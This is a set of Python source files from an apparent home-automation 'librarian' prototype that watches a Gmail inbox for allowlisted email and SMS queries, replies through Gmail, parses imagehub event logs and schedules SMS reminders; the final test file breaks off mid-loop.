# for message in messages:
# pprint.pprint(message)
# print()
# messages().list() returns a list of message & thread ids
# Id and threadId; if they are the same value
# then message is the first message in a new thread
# get a single message & get its historyId
# results is a dict of all the fields of a single message; see API docs
results = gmail.users().messages().get(userId='me',
id=latestMessageId, format='minimal').execute()
if not results:
# print('No message retrieved')
pass
else:
historyId = results.get('historyId', None)
# print('Retrieval of message: ', latestMessageId, 'of thread: ',
# latestMessageThreadId)
# pprint.pprint(results)
return gmail, historyId
def get_credentials(self):
"""Gets valid user credentials from token.pickle storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
The OAuth2 flow uses the Chrome browser; USE SDB broswer login!!!
(Because we are reading SDB email)
Returns:
creds, the obtained credentials.
"""
# If modifying these scopes, delete the file token.pickle.
# Then, next get_credentials() will build new token with new SCOPES.
SCOPES = ['https://www.googleapis.com/auth/gmail.modify']
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
token_file = self.token_file
credentials_file = self.credentials_file
# print('Creds file names:')
# print(' token:', token_file, ' type:', type(token_file))
# print(' creds:', credentials_file, ' type:', type(credentials_file))
if os.path.exists(token_file):
with open(token_file, 'rb') as token:
creds = pickle.load(token)
# print('Pickled token loaded.')
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
# print('Doing creds refresh:')
if creds and creds.expired and creds.refresh_token:
# print('Doing Refresh Credentials Request:')
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
credentials_file, SCOPES)
# print("Used existing credentials_file OK.")
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(token_file, 'wb') as token:
# print('Saving token.pickle file.')
pickle.dump(creds, token)
return creds
def gmail_watcher(self, gmail, historyId, mail_check_seconds,
phones_OK_list, emails_OK_list):
# By putting historyId into a list, it becomes mutable and holds updates
history_list = [historyId] # historyId will be updated by below
next_page_token = ['empty<PASSWORD>'] # token for getting 2nd page of results
while True: # forever loop watching gmail mailbox for changes
if self.mailbox_changed(gmail, history_list, next_page_token,
mail_check_seconds):
# get new messages from gmail, but only the ones that are from
# senders on our OK lists; others are skipped.
new_messages = self.get_new_messages(gmail,
phones_OK_list,
emails_OK_list)
# print('New messages:')
# pprint.pprint(new_messages)
if new_messages: # there are some new messages
self.mark_as_read(gmail, new_messages) # move to below send_query!
for message in new_messages:
# each message is a tuple of values from get_new_messages()
# create a query from the tuple that is string of pure text
query = "|".join(list(message))
# need to add Patience() code here to recover from
# network or librarian outages, similar to how
# imagenodes do.
REP = self.q_s.send_query(query) # ZMQ REP b'OK'
def mailbox_changed(self,gmail, history_list, next_page_token, mail_check_seconds):
''' Use history().list() to check for changes to mailbox
Depending on how often the gmail api is "checked"
it is possible for the multiple calls per minute to watch
for new emails be very expensive. Using history().list() is better.
Google has Usage Limits measured in Quota Units.
messages().list() is 5 Quota Units and
history().list() is 2 Quota Units (less than half price)
drafts().send() is 100 Quota Units
This function implements a forever polling loop checking
history().list() for changes. Returns True when history
has changed, meaning something in the mailbox has changed.
There may be false positives (unimportant mailbox changes),
but other functions check for valid / important messages.
This function only watches for history().list() changes
Parameters:
gmail (service object): the Gmail service object
history_list (list): list of historyId's. Update to newest one each loop.
next_page_token (list): list whose 1st element is the nextPageToken
mail_check_seconds (int): how often to check the gmail history list
Returns:
Boolean True if mailbox change; False if not
'''
startHistoryId = history_list[0]
# users().history().list() requires a valid startHistoryId.
# The startHistoryId was obtained by gmail_start_service().
# print("startHistoryId: ", startHistoryId, "is type: ", type(startHistoryId))
last_results = gmail.users().history().list(userId='me',
startHistoryId=startHistoryId,
maxResults=10).execute()
i = 0 # number of history changes checks
num_err_results = 0
while True: # loop forever until a there is a change in mailbox history
# Do not check history more often than mail_check_seconds
sleep(mail_check_seconds)
try:
results = gmail.users().history().list(userId='me',
startHistoryId=startHistoryId,
maxResults=10).execute()
except Exception as ex:
num_err_results += 1
log.error("Error raised in gmail.history.list() num = " + str(num_err_results))
results = last_results # set to last non-error results
if num_err_results > 10: # too many; put into a variable?
raise # raise the exception up to main handler
else: # wait for timeout type error to clear
sleep(10) # need to edit this into a variable?
i += 1
if results == last_results: # no mailbox history changes
# print('Retrieved results #', i, ": No changes")
pass
else: # some changes in history().list()
# print('Retrieved results #', i, ": Some changes")
# last_results = results
nextPageToken = results.get("nextPageToken", "emptyToken")
historyId = results.get("historyId", "emptyId")
# print("nextPageToken: ", nextPageToken)
# print("historyId: ", historyId)
# set historyId and nextPageToken as new list elements
history_list[0] = historyId # save historId in list for next call
next_page_token[0] = nextPageToken
return True
# print("No history changes pass ", i)
def is_SMS(self, from_value):
# check that this message has address form of a text message
if ('<EMAIL>>' in from_value
and '(SMS)' in from_value
and '<1' in from_value):
return True
else:
return False
def get_new_messages(self, gmail, phones_OK_list,
emails_OK_list, n=25):
''' gets some new messages from gmail messages.list()
Parameters:
phones_OK_list (list): list of phone numbers OK to receive from
emails_OK_list (list): list of emails it is OK to receive from
n (int): number of emails to retrieve in a batch
'''
# print("Fetching message list")
results = gmail.users().messages().list(userId='me',
labelIds=['UNREAD', 'INBOX'],
maxResults=n).execute()
message_list = []
if 'messages' in results:
message_list.extend(results['messages'])
else:
return None
# print("Number of messages in results: ", len(message_list))
if len(message_list) == 0:
return None
new_messages = []
for message in message_list:
msg_id = message.get('id', None)
message = gmail.users().messages().get(userId='me',
id=msg_id).execute()
thread_id = message.get('threadId', None)
labels = message.get('labelIds', None)
message_internalDate = message['internalDate']
message_datetime = datetime.fromtimestamp(int(int(message_internalDate)/1000))
payload = message['payload']
headers = payload['headers']
# each header is a dictionary holding 2 tuples
# each tuple is (header name, header value)
# name and value are unicode strings
for header in headers:
name, value = header.items()
name_str = str(name[1])
from_str = u'From'
subject_str = u'Subject'
to_str = u'To'
if (name_str == from_str):
from_value = value[1]
elif (name_str == subject_str):
subject_value = value[1]
elif (name_str == to_str):
to_value = value[1]
# print("Debugging SMS:")
# print("From:", from_value)
# print("is_SMS value:", is_SMS(from_value))
if self.is_SMS(from_value):
# extract SMS sending phone number from "From" header
num_start = from_value.find('<1') + 14
num_end = num_start + 10
sms_from = from_value[num_start:num_end]
# print("sms_from: |" + sms_from + "|")
if sms_from not in phones_OK_list:
continue
message_text = message['snippet'][13:]
text_end = message_text.find(" YOUR ")
message_text = message_text[:text_end]
else: # a regular email; not SMS
sms_from = None
# print('Email from: ', from_value, type(from_value))
if from_value not in emails_OK_list:
continue
message_text = message['snippet']
# print("message_text:", message_text)
# line=line.decode('utf-8','ignore').encode("utf-8")
# bytes(line, 'utf-8').decode('utf-8','ignore')
# used encode to get rid of all non-ascii characters
message_text = bytes(message_text, 'utf-8').decode('utf-8','ignore')
# print('message_text:', message_text, 'type:', type(message_text))
# replace snippet encoding of apostrophe
# TODO Find out why can't find / replace '
message_text = message_text.replace("'", "'")
# append message tuple to new_messages, message_text first
new_messages.append((message_text, msg_id, thread_id,
from_value, subject_value,
to_value, sms_from),)
return new_messages
def mark_as_read(self, gmail, new_messages):
""" Mark gmail messages as read by removing UNREAD label
Parameters:
gmail (service object): gmail service object
new_message (list): list of messages to be marked as "READ"
"""
if new_messages is None: # no messages to mark
return
for message in new_messages:
msg_id = message[1]
gmail.users().messages().modify(userId='me',
id=msg_id,body={'removeLabelIds': ['UNREAD']}).execute()
def gmail_send_reply(self, gmail, reply_str):
""" gmail_send_reply: send reply from the Librarian back via gmail
This function is called from the librarian main loop.
It sends a single query reply back via gmail. Each query sent to the
librarian from gmail has header info appended to the text of the
message. This gmail reply sender uses that header info to reply to the
correct messageId, threadId, etc.
Structure of reply_str:
reply_text|msg_id|thread_id|to_value|subject_value|from_value|sms_from
(note that to_value and from_value are swapped from original message)
(reply protocol requires this swapping pattern to draft a reply)
Parameters:
gmail (Gmail service object): Gmail service object for Gmail API
reply (str): reply from Librarian to be sent back via gmail
"""
# First parse the reply into message text and gmail threadid, etc.
reply = reply_str.split('|') # reply is list of reply parts in reply_str
# then load the draft reply and send it
threadid = reply[2] # thread being replied to
to_send = MIMEText(reply[0]) # text of reply created by librarian
# to_send = reply[0] # text of reply created by librarian
to_send["To"] = reply[3] # replying to (whick was from_value in msg)
to_send["Subject"] = reply[4] # replying to subject
to_send["From"] = reply[5] # replying from (which was to_value in msg)
# example: bytesThing = stringThing.encode(encoding='UTF-8')
raw = base64.urlsafe_b64encode(to_send.as_string().encode(encoding='UTF-8'))
raw = raw.decode(encoding='UTF-8') # convert back to string
message = {'message': {'raw': raw, 'threadId': threadid}}
draft = gmail.users().drafts().create(userId="me", body=message).execute()
draftid = draft['id']
gmail.users().drafts().send(userId='me',
body={ 'id': draftid }).execute()
def gmail_send_SMS(self, phone_number, message_text):
""" gmail_send_SMS: send SMS text message via Gmail
It sends a single SMS text message. For security and other reasons, this
does not send a Gmail meessage. Instead it searches for a GMail
SMS message from the phone number. Then composes a reply_str. Then
Structure needed for reply_str:
reply_text|msg_id|thread_id|to_value|subject_value|from_value|sms_from
(note that to_value and from_value are swapped from original message)
(reply protocol requires this swapping pattern to draft a reply)
Parameters:
phone_number (str): phone number to send text message to
message (str): message to send to phone_number
"""
# use phone number to search for Gmail SMS messages from that number
gmail = self.gmail
p = phone_number.strip()
area_code = p[0:3]
first_3 = p[3:6]
last_4 = p[6:10]
search = ' '.join(['SMS', area_code, first_3, last_4])
# print('Search String Parts:')
# print(' area_code:', area_code)
# print(' first_3:', area_code)
# print(' last_4:', area_code)
# print('Search string for Gmail:', search)
results = gmail.users().messages().list(userId='me',
maxResults=10,includeSpamTrash=False,q=search).execute()
num_msgs = results.get('resultSizeEstimate', -1)
messages = results.get('messages', [])
num_messages = len(messages)
# print('Number of messages from Gmail SMS number query', num_messages)
if not messages:
latestMessageId = None
else:
# get the first message in the list which should be the latest
latestMessageId = messages[0].get('id', None)
latestMessageThreadId = messages[0].get('threadId', None)
msg_id = messages[0].get('id', None)
message = gmail.users().messages().get(userId='me',
id=msg_id).execute()
thread_id = message.get('threadId', None)
labels = message.get('labelIds', None)
message_internalDate = message['internalDate']
message_datetime = datetime.fromtimestamp(int(int(message_internalDate)/1000))
payload = message['payload']
headers = payload['headers']
# each header is a dictionary holding 2 tuples
# each tuple is (header name, header value)
# name and value are unicode strings
for header in headers:
name, value = header.items()
name_str = str(name[1])
from_str = u'From'
subject_str = u'Subject'
to_str = u'To'
if (name_str == from_str):
from_value = value[1]
elif (name_str == subject_str):
subject_value = value[1]
elif (name_str == to_str):
to_value = value[1]
# print("Debugging SMS:")
# print("From:", from_value)
# print("is_SMS value:", is_SMS(from_value))
# print("message_text:", message_text)
# line=line.decode('utf-8','ignore').encode("utf-8")
# bytes(line, 'utf-8').decode('utf-8','ignore')
# used encode to get rid of all non-ascii characters
# message_text = bytes(message_text, 'utf-8').decode('utf-8','ignore')
# print('message_text:', message_text, 'type:', type(message_text))
# replace snippet encoding of apostrophe
# TODO Find out why can't find / replace '
# message_text = message_text.replace("'", "'")
# append message tuple to new_messages, message_text first
if 'SMS' in to_value:
to_value, from_value = from_value, to_value
time_str = datetime.now().strftime("%I:%M %p").lstrip("0")
message_text = message_text + " (" + time_str + ")"
message_tuple = (message_text, msg_id, thread_id,
from_value, subject_value,
to_value, search)
msg_string = "|".join(list(message_tuple))
# print("The message string with msg_id, thread_id, etc:")
# print(msg_string)
self.gmail_send_reply(gmail, msg_string)
def close(self):
""" close: close the QueryReceiver ZMQ port and context
"""
self.q_r.close()
def get_contacts(self, gmail_dir, details):
"""Gets contacts from contacts data file
Example lines from contacts.txt for reference
name|full_name|canonical_name|mobile_phone|email
Jeff|<NAME>|jeff_bass|8885551212|<EMAIL>
Returns:
contacts, a list of named tuples of contact info
Example:
>>> [contact.mobile_phone for contact in contacts if contact.name=='Jeff']
['8885551212']
"""
contacts_file = details.get('contacts', 'contacts.txt')
contacts_file = gmail_dir / Path(contacts_file)
# print('contacts file:', contacts_file )
with open(contacts_file, 'r') as f:
# read header line and set up namedtuple
lines = csv.reader(f, delimiter='|')
# fields = lines.next() # field names list from first line in file
fields = next(lines) # field names list from first line in file
Contact = namedtuple('Contact', fields)
# read all lines in file, creating a named tuple for each line in file
# if len(line) > 0 avoids TypeError due to any blank lines at end of file
contacts = [Contact(*line) for line in lines if len(line) > 0]
return contacts
def fix_comm_link(self):
""" Evaluate, repair and restart communications link with librarian.
Restart link if possible, else restart program.
"""
# TODO add some of the ongoing experiments to this code when it has
# progressed in development and testing
# Current protocol:
# just sys.exit() for now.
# Because this program is started
# and restarted by systemd as a service with restart option on, it
# will restart the program with a delay and try communicating again.
# It will be logged in systemctl journald.
#
# Other ideas that might be worth trying:
# 1. Just wait longer one time and try sending again
# 2. Doing 1 repeatedly with exponential time increases
# 3. Stopping and closing ZMQ context; restarting and sending
# last message
# 4. Check WiFi ping; stop and restart WiFi service
#
raise KeyboardInterrupt
```
#### File: librarian-prototype/librarian/gmail_watcher.py
```python
import sys
import signal
import traceback
import logging
import logging.handlers
from helpers.library import Settings
from helpers.comms.gmail import Gmail
from helpers.utils import clean_shutdown_when_killed
def main():
# set up controlled shutdown when Kill Process or SIGTERM received
signal.signal(signal.SIGTERM, clean_shutdown_when_killed)
log = start_logging()
gmail = None # will allow 'finally:'' to work correctly if no gmail exists
try:
log.warning('Starting gmail_watcher.py')
gmail = None # will allow finally: to work correctly if no gmail exists
settings = Settings() # get settings for communications channels
details = settings.comm_channels.get('gmail', {})
gmail = Gmail(settings, details)
gmail.gmail_watcher(gmail.gmail, gmail.historyId,
gmail.mail_check_seconds, gmail.phones_OK_list,
gmail.emails_OK_list)
except (KeyboardInterrupt, SystemExit):
log.warning('Ctrl-C was pressed or SIGTERM was received.')
except Exception as ex: # traceback will appear in log
log.exception('Unanticipated error with no Exception handler.')
finally:
if gmail:
gmail.q_s.close()
log.info('Exiting gmail_watcher.py')
sys.exit()
def start_logging():
log = logging.getLogger()
handler = logging.handlers.RotatingFileHandler('gmail_watcher.log',
maxBytes=95000, backupCount=15)
formatter = logging.Formatter('%(asctime)s ~ %(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.WARNING)
return log
if __name__ == '__main__' :
main()
```
#### File: librarian/helpers/data_tools.py
```python
import sys
import pprint
import logging
import threading
import subprocess
from time import sleep
from pathlib import Path
from datetime import datetime
from collections import deque
from helpers.utils import YamlOptionsError
class HubData:
""" Methods and attributes to transfer data from imagehub data files
Provides methods for Librarian to access imagehub data, including event
logs and images stored by the imagehub.
Parameters:
settings (Settings object): settings object created from YAML file
"""
def __init__(self, settings):
# log directory and log file refer to the event log of the imagehub
ld = Path(settings.log_directory)
if not ld.exists():
raise YamlOptionsError('Log directory in YAML file does not exist.')
elif not ld.is_dir():
raise YamlOptionsError('Log directory in YAML file is not a directory.')
self.log_dir = ld
self.max_days = 3 # Number of days of hub log files to be loaded
self.max_history = 300 # Maximum size of the event_deque history
self.event_data = {} # see description in load_log_data function
self.newest_log_line = '' # keep track of last text line read from log
self.line_count = 0 # total lines read into event_data since program startup; useful for librarian status
self.event_data_lock = threading.RLock()
self.load_log_data(self.log_dir, self.max_days) # inital load self.event_data()
# pprint.pprint(self.event_data)
# start thread receive & add data to self.event_data as new lines are
# added to the imagehub log.
self.log_check_interval = 2 # seconds: how often check for added log lines
t = threading.Thread(target=self.watch_for_new_log_lines)
# print('Starting watch_for_new_log_lines thread.')
t.daemon = True # allows this thread to be auto-killed on program exit
t.name = 'watch_for_new_log_lines' # naming the thread helps with debugging
t.start()
""" # this is the block of lines used to test self.add_new_log_lines()
print('Total number of lines read from all log files:', self.line_count)
print('BEFORE call to add_new_log_lines: Newest log line:', self.newest_log_line)
# testing the add lines modules
query = input('Add some lines to imagehub.log, then press enter. ')
self.add_new_log_lines()
print('AFTER call to add_new_log_lines: Newest log line:', self.newest_log_line)
pprint.pprint(self.event_data)
print('Total number of lines read from all log files:', self.line_count)
print('End of test')
sys.exit() """
def load_log_data(self, ld, max_days):
""" read the imagehub log file(s), loading the event_deque
This method reads event lines from the log files. It always reads the
current log file. It also reads up to "max_days" additional log files.
Event log files are created by the imagehub.py program. They are created
using the Python logging module and rotate daily at midnight.
Event log files are "rotated" using Python's TimedRotatingFileHandler:
This means the imagehub log files have names like:
lf.log, lf.log.2020-10-22, lf.log.2020-10-21, lf.log.2020-10-20, ...
where:
lf.log is the "current log" that is currently updated by imagehub.
lf.log.<<date>> is the name pattern for the logs rotated each day.
The log files are loaded in time order. The oldest log file (up to
'max_days' old) is loaded. Then the next oldest log file is loaded,
then the next oldest log file until the current_log file, which is
always loaded last. The lines from each log file are loaded into the
event_data deque by the self.load_log_event_lines method.
Parameters:
ld (PosixPath): imagehub log directory containing event log files
max_days (int): number of additional log file day(s) to load
"""
all_logs = list(ld.glob('*log*')) # all files that have *log* in them
current_log = list(ld.glob('*log')) # current log ends in 'log'
if not current_log:
raise YamlOptionsError('There is no file ending in "log".')
elif len(current_log) > 1:
raise YamlOptionsError('More than one file ending in "log".')
else:
current_log = current_log[0] # now current log is PosixPath file
self.log_file = str(current_log) # string version of log file name
all_logs.remove(current_log) # keep only the 'dated' logs
logs_to_load = list()
if all_logs: # we have at least one 'dated' log...
# ...so get the most recent 'max_days' of them
all_logs.sort(reverse=True)
logs_to_load = all_logs[:self.max_days] # most recent ones
logs_to_load.sort() # sort them in time order: oldest to newest
logs_to_load.append(current_log) # append the current log last
for log in logs_to_load:
with open(log, 'r') as f:
lines = f.readlines()
self.load_log_event_lines(lines)
def load_log_event_lines(self, lines):
""" loads lines from a log file into the event_data dict()
Loads event lines from the log files. Loads one line at
a time, adding the event data to the self.event_data dict() which is a
nested dictionary. Example data values from self.event_data:
node event deque of tuples of data values
| |
event_data['barn']['motion'] values[0] = (datetime, 'moving') # current
values[1] = (datetime, 'moving') # previous
values[2] = (datetime, 'moving') # earlier
Each data tuple is (datetime, event_value) where each
event_value is a measure like "77 degrees" or a state like "motion".
This deque is of fixed length, so as new data points are left_appended,
those data points beyond max_history are discarded from the event_data
dictionary (but not from the event log files; those are "read only"
from the perspective of the librarian; they are written ONLY by the
imagehub program).
Parameters:
lines (list): lines from an imagehub event log file
"""
for line in lines:
self.line_count += 1
# node_tuple is (node, event, when, value)
node_tuple = self.parse_log_line(line) # returns "None" if invalid
if node_tuple: # only load a valid node_tuple that is not "None"
self.load_log_event(node_tuple)
self.newest_log_line = lines[-1]
def load_log_event(self, node_tuple):
""" load a single node event into the self.event_data dict()
Creates a single entry in the self.event_data dict() which holds all
the recent events logged from imagenodes.
'node_tuple' objects are parsed from imagehub log lines by the method
self.parse_log_line(). This method creates entries in self.event_data.
node event deque of tuples of data values
| |
event_data['barn']['motion'] values[0] = (datetime, 'moving') # current
values[1] = (datetime, 'moving') # previous
values[2] = (datetime, 'moving') # earlier
Each data tuple is (datetime, event_value) where each
event_value is a measure like "77 degrees" or a state like "motion".
This deque is of fixed length, so as new data points are left_appended,
those data points beyond max_history are discarded from the event_data
dictionary (but not from the event log files; those are "read only"
from the perspective of the librarian; they are written ONLY by the
imagehub program).
All string values in the tuple are stripped of whitespace and converted
to lower case: 'node', 'event', 'value'.
'when' is a datetime value and is stored as is.
Parameters:
node_tuple (tuple): parsed values from a single event log line
"""
# node_tuple is (node, event, when, value)
node = node_tuple[0].strip().lower()
event = node_tuple[1].strip().lower()
when = node_tuple[2]
value = node_tuple[3].strip().lower()
with self.event_data_lock:
if node not in self.event_data:
self.event_data[node] = {}
if event not in self.event_data[node]:
self.event_data[node][event] = deque(maxlen=self.max_history)
self.event_data[node][event].appendleft((when, value))
def parse_log_line(self, line):
""" parse a single line from a log file returning a tuple of values
Parses a single event line of text from a log file and returns a tuple
(node_name, event_type, <<datetime>>, event_value)
An event_value is a measure like "77 degrees" or a state like "motion".
This deque is of fixed length, so as new data points are left_appended,
those data points beyond 'max_history' are discarded from the event_data
dictionary (but not from the event log files; those are "read only"
from the perspective of the librarian; they are written ONLY by the
imagehub program).
Example:
Input Log data lines like these:
2020-06-09 18:27:11,776 ~ Driveway Mailbox|motion|moving
2020-06-09 18:33:15,788 ~ Barn|Temp|83 F
Return tuples like these:
(Driveway Mailbox, motion, <<datetime>>, moving)
(Barn, Temp, <<datetime>>, 83)
Parameters:
line (str): a single log line read from a log file
Returns:
tuple (node, event, when, value)
OR
None # if there is not a valid datetime in beginning of line
"""
two_parts = line.split('~')
part1 = two_parts[0].strip()
try:
when = datetime.strptime(part1, "%Y-%m-%d %H:%M:%S,%f")
except ValueError:
return None # Every valid line has a valid datetime
part2 = two_parts[1].rstrip(' F\n').strip().split('|')
if len(part2) < 3: # this is not a node message; system or other msg
node = 'non-node'
event = 'other'
value = part2[0] # there will be at least one strng
else:
node = part2[0] # e.g. barn
event = part2[1] # e.g. motion
value = part2[2] # e.g. still
return node, event, when, value
def watch_for_new_log_lines(self):
""" watch_for_new_log_lines: thread to fetch newly added log lines
"""
while True:
self.add_new_log_lines()
sleep(self.log_check_interval)
def add_new_log_lines(self):
""" add new event log data lines to self.event_data dict()
Runs in a thread that is started when HubData is instantiated.
Checks imagehub event log file(s) for any changes by using the linux
"tail" utility (chosen because it is very fast and does NOT read the
entire file as a Python program would need to). Adds any newly added
event log lines to the self.event_data dict().
Algorithm:
1. tail -n_lines from current log file
2. is newest_log_line the last line in the tail? return; no new lines
3. if the tail of n_lines includes the newest_log_line, then
load_log_event_lines from that line through to the last line in log
4. else do a tail with more lines up until either find newest_log_line
or the entire last 2 log files have been returned
"""
# get n_lines from tail of log file and check if contains last_line_read
line_num = 0
try_n_lines = [10, 20, 40, 80, 160, 320, 640, 1024, 2048, 4096]
for n_lines in try_n_lines:
# OS command equivalent: tail -n_lines < self.log_file
lines = self.log_tail(n_lines)
# print("A: len(lines) is ", len(lines), 'n_lines:', n_lines)
""" for i, l in enumerate(lines):
print('Line', i, ':', l)
print('B: Comparison of lines[-1]:')
print('B: and self.newest_log_line')
print(lines[-1][:23])
print(self.newest_log_line[:23])
assert lines[-1][:23] == self.newest_log_line[:23], "First 23?"
assert lines[-1] == self.newest_log_line, "Full length not equal!"
print('After assert.') """
# is the last line in the log file still the newest log line?
if lines[-1][:30] == self.newest_log_line[:30]:
# print('C: right before return')
return # there are no new lines in log file
# print('D: after lines[-1] comparison:')
# print('len(lines) vs. n_lines:')
# print("D: len(lines) is ", len(lines), 'n_lines:', n_lines)
if len(lines) > n_lines: # added a 2nd log file, load all lines
self.load_log_event_lines(lines)
return
for n, line in enumerate(lines): # is newest log line in tail?
if line[:30] == self.newest_log_line[:30]: # found a match line
# print('About to add lines from', n, ' to ', len(lines)-1 )
# for i, l in enumerate(lines[n+1:]):
# print('Line', i, ':', l)
self.load_log_event_lines(lines[n+1:])
return
return
def log_tail(self, n_lines):
""" uses linux "tail" command to get last n_lines from current log file
Called by add_new_log_lines in a thread that is started when HubData is
instantiated.
If n_lines exceeds number of lines in current log file, combine with
next earlier log file; current limit is 1 earlier log file
Parameters:
n_lines (int): number of lines to "tail" from the log file(s).
Returns:
lines (list): lines returned by running os command "tail -n_lines"
"""
n = '-n ' + str(n_lines).strip() # prepare -n argument
tail = subprocess.run(['tail', n, self.log_file],
capture_output=True, text=True)
lines = tail.stdout.splitlines() # these lines are from current log file
if len(lines) < n_lines: # we got fewer lines than requested;
# so we add the entire next-oldest log file for testing purposes,
# and return the lines from both files, first the next-oldtest lines
# followed by all the lines from the current log file.
logs = list(self.log_dir.glob('*log*')) # list of log files
logs.sort(reverse=True) # First, sort the entire list reversed
with open(logs[0], 'r') as f: # then read the first dated log file
lines1 = f.readlines() # which has lines preceding current log file
lines1.extend(lines) # both log files are combined; current log is last
return lines1
# print('Number of lines returned from log_tail:', len(lines))
return lines
def fetch_event_data(self, node, event):
""" fetch some specified data from event logs or images
This fetches data from the self.event_data dict() that holds event data.
Data returned is either 'current' or 'previous', or both, where
'current' is the most recent logged event for a node, and 'previous' is
the one immediately preceding it.
Returned data values are always a string, even if representing a number.
Parameters:
node (str): what node to fetch data for, e.g., barn
event_type (str): what event or measurement, e.g. temperature or motion
Returns:
(2 tuples): (current, previous): with each tuple containing:
datetime (datetime): the datetime associated with the event
value (str): the feteched data item, e.g. '77' for temperature
"""
node = node.strip().lower() # all string values in event_data are
event = event.strip().lower() # already stripped and lower case
with self.event_data_lock: # acquire lock to work with event_data updates
event_type = self.event_data.get(node, None)
if event_type:
event_deque = event_type.get(event, None)
if event_deque:
current = event_deque[0] # the most recent date & value
if len(event_deque) > 1:
previous = event_deque[1] # the previous date & value
else:
previous = None
return (current, previous)
else:
return None, " ".join(["Don't know", node, event])
else:
return None, " ".join(["Don't know", node])
```
#### File: librarian/helpers/schedules.py
```python
import sys
import pprint
import logging
import schedule
import threading
import subprocess
from time import sleep
from pathlib import Path
from datetime import datetime
from collections import deque
from helpers.comms.gmail import Gmail
from helpers.utils import YamlOptionsError
log = logging.getLogger(__name__)
class Schedule:
""" Methods and attributes to manage schedules.
Provides a variety of classes to hold scheduled taks, update them and answer
queries about them.
Parameters:
settings (Settings object): settings object created from YAML file
"""
def __init__(self, settings, gmail):
# get schedules dictionary from yaml file
schedules = settings.schedules
self.gmail = gmail
if schedules: # at least one schedled item in yaml
schedule_types = self.load_schedule_data(schedules) # e.g., reminders
s = self.setup_schedule(schedule_types)
self.schedule_run(s) # run a thread that runs scheduled tasks
def load_schedule_data(self, schedules):
""" load schedule data from yaml file dictionary
Parameters
schedules (dict): schedule items in yaml file
Returns:
schedule_options (list): list of all the requested schedule items
"""
schedule_types = []
valid_schedule_types = ['backups', 'reminders']
for s_type in valid_schedule_types:
sched = schedules.get(s_type, {})
if sched: # not empty
schedule_types.append(sched)
# print('schedule_types', *schedule_types)
return schedule_types
def setup_schedule(self, schedule_types):
""" load schedule data from yaml file dictionary
Parameters:
schedule_types (list): schedule items in yaml file
"""
for event_type in schedule_types: # e.g., reminders, backups, etc.
for _, event_specs in event_type.items(): # events are nested dictionaries from yaml
if 'message' in event_specs: # this event action is 'send message'
# days = event_specs.get('days', 'all') # maybe in future?
times = event_specs.get('times', [])
# times is a list of times in strings, like '10:30'
# print('list of times', *times)
message = event_specs.get('message', '')
# print('message:', message)
channel = event_specs.get('channel', '')
# print('channel:', channel)
phone = event_specs.get('phone', '')
# print('phone:', phone)
func = self.send_sms
args = (phone, message)
for t in times:
schedule.every().day.at(t).do(self.send_sms, phone, message)
# print('A: Number of timed jobs:', len(schedule.jobs))
return schedule
def send_sms(self, phone, message):
""" send an SMS message
Sends an SMS message using the Gmail SMS interface.
Parameters
phone (str): phone number to send SMS message to
message (str): message to send via SMS
"""
# print('Sent:', message, 'To:', phone, ' -- at', datetime.now().isoformat())
self.gmail.gmail_send_SMS(phone, message)
def run_backups(self, source, destination):
# a possible setup of the backup section of schedules is in example3.yaml
pass
def schedule_run(self, schedule):
""" run all scheduled jobs that have been setup in schedule
Parameters:
schedule (schedule object): contains all scheduled jobs
"""
if len(schedule.jobs): # no need to start thread if no jobs in queue
t = threading.Thread(target=self.scheduler_thread)
# print('Starting scheduler thread')
t.daemon = True # allows this thread to be auto-killed on program exit
t.name = 'Scheduler Thread' # naming the thread helps with debugging
t.start()
def scheduler_thread(self):
while True:
schedule.run_pending()
sleep(1)
```
#### File: librarian/helpers/utils.py
```python
import sys
import time
import signal
import logging
import multiprocessing
def clean_shutdown_when_killed(signum, *args):
"""Close all connections cleanly and log shutdown
This function will be called when SIGTERM is received from OS
or if the program is killed by "kill" command. It then raises
KeyboardInterrupt to close all resources and log the shutdown.
"""
logging.warning('SIGTERM detected, shutting down')
sys.exit()
def interval_timer(interval, action):
""" Call the function 'action' every 'interval' seconds
This is typically used in a thread, since it blocks while it is sleeping
between action calls. For example, when a check_temperature sensor is
instantiated, this timer is started in a thread to call the
check_temperature function at specified intervals.
Parameters:
interval (int): How often to call the function 'action' in seconds
action (function): Function to call
"""
next_time = time.time() + interval
while True:
time.sleep(max(0, next_time - time.time()))
try:
action()
except (KeyboardInterrupt, SystemExit):
logging.warning('Ctrl-C was pressed or SIGTERM was received.')
raise
except Exception:
logging.exception('Error in interval_timer')
next_time += (time.time() - next_time) // interval * interval + interval
class YamlOptionsError(Exception):
pass
class Patience:
"""Timing class using system ALARM signal.
When instantiated, starts a timer using the system SIGALRM signal. To be
used in a with clause to allow a blocking task to be interrupted if it
does not return in specified number of seconds.
See main event loop in Imagenode.py for Usage Example
Parameters:
seconds (int): number of seconds to wait before raising exception
"""
class Timeout(Exception):
pass
def __init__(self, seconds):
self.seconds = seconds
def __enter__(self):
signal.signal(signal.SIGALRM, self.raise_timeout)
signal.alarm(self.seconds)
def __exit__(self, *args):
signal.alarm(0) # disable alarm
def raise_timeout(self, *args):
raise Patience.Timeout()
class StallWatcher:
def __init__(self):
self.stall_p = None
if settings.stall_watcher: # stall_watcher option set to True
pid = os.getpid()
self.stall_p = multiprocessing.Process(daemon=True,
args=((pid, self.patience,)),
target=self.stall_watcher)
self.stall_p.start()
def stall_watcher(self, pid, patience):
""" Watch the main process cpu_times.user; sys.exit() if not advancing
Parameters:
pid (int): process ID of the main imagenode process
patience (int): how long to wait for each check repeated check
"""
p = psutil.Process(pid)
main_time = p.cpu_times().user
sleep_time = patience
sleep(sleep_time)
while True:
last_main_time = main_time
main_time = p.cpu_times().user
delta_time = round(abs(main_time - last_main_time))
if delta_time < 1:
os.kill(pid, signal.SIGTERM) # p.terminate() # or os.kill(pid, signal.SIGTERM)
sys.exit()
sleep(sleep_time)
```
#### File: librarian-prototype/librarian/test_schedule.py
```python
import schedule
from time import sleep
from datetime import datetime
def job(n):
print('Running job', n, 'at', datetime.now().isoformat())
schedule.every().day.at("22:38").do(job, 1)
schedule.every().day.at("22:55").do(job, 2)
schedule.every().day.at("22:56").do(job, 3)
while True:
